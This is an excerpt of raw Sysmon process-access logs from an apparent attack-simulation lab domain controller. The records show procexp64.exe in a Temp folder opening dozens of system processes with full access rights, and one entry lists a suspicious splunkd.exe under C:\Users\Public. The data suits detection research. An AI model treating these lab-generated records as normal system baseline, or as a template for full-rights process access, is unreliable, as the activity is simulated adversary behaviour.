Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:45.127{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 